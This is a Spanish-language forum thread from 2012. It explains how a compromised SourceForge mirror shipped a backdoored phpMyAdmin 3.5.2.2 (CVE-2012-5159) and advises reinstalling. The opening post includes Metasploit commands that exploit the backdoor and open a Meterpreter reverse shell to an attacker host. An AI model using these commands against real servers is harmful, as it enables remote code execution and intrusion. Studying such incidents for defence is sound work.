BackDoor en phpMyAdmin [Vídeo explotación con Metasploit]

Iniciado por Stiuvert, Septiembre 27, 2012, 05:16:07 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Imprimir
Ir Abajo Páginas1
Acciones del Usuario
Septiembre 27, 2012, 05:16:07 PM
Recientemente se ha publicado un error de seguridad en phpMyAdmin, aunque en realidad el error de seguridad fue provocado por unos de los servidores de descarga de You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login.


El Mirror de descargas cdnetworks-kr-1 de SourceForge fue comprometido por atacantes malintencionados, quienes modificaron el fichero de descarga You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login agregándole 2 archivos maliciosos que cumplen con el rol de Backdoor en el sistema, específicamente el archivo server_sync.php es el que permite a un atacante ejecutar remotamente código PHP.



A pesar de que recién ayer fue confirmada la vulnerabilidad, Metasploit ya hizo su trabajo (como siempre) y ya existe el You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login.



Aquí les dejo el vídeo de como explotar CVE-2012-5159 phpMyAdmin 3.5.2.2 server_sync.php Backdoor con Metasploit:





use exploit/multi/http/phpmyadmin_3522_backdoor
set RHOST 192.168.178.40
set PATH /phpMyAdmin-3.5.2.2-all-languages
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST 192.168.178.33
exploit

sysinfo
getuid


También se recomienda a aquellos que tengan phpMyAdmin lo mejor es descargar y reinstalar phpMyAdmin para evitar cualquier tipo de problema.

Más Información:
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Vídeo:
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Septiembre 27, 2012, 05:51:20 PM #1
Buenismo man! Tremendo aporte!
+Karma!

Imprimir
Ir Arriba Páginas1
Acciones del Usuario